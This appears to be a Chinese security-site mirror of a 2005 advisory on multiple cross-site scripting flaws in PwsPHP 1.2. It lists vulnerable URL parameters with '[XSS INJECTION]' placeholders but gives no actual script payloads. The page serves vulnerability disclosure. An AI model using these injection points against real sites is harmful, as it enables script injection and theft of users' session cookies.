PWSPHP 1.2 – Multiple Cross-Site Scripting Vulnerabilities

PWSPHP 1.2 – Multiple Cross-Site Scripting Vulnerabilities

漏洞ID 1055095 漏洞类型
发布时间 2005-05-09 更新时间 2005-05-09
图片[1]-PWSPHP 1.2 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-PWSPHP 1.2 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25639
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13561/info

PwsPHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

The vendor has addressed these issues in PwsPHP version 1.2.3; earlier versions are reported vulnerable. 

http://www.example.com/index.php?mod=news&ac=plus&month=[XSS INJECTION]&annee=[XSS INJECTION]
http://www.example.com/index.php?mod=stats&aff=forum&nbractif=[XSS INJECTION]
http://www.example.com/index.php?mod=stats&aff=pages&annee=[XSS INJECTION]
http://www.example.com/profil.php?id=1%20[XSS INJECTION]
http://www.example.com/memberlist.php?mb_lettre=%A4%20[XSS INJECTION]
http://www.example.com/memberlist.php?mb1_order=id&mb1_ord=DESC&lettre=[XSS INJECTION]
http://www.example.com/index.php?&mod=recherche&choix_recherche=2&chaine_search=[XSS INJECTION]&multi_mots=tous&choix_forum=1&auteur_search=[XSS INJECTION]

相关推荐: Fortigate Firewall 2.x – selector Admin Interface Cross-Site Scripting

Fortigate Firewall 2.x – selector Admin Interface Cross-Site Scripting 漏洞ID 1054247 漏洞类型 发布时间 2003-11-12 更新时间 2003-11-12 CVE编号 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享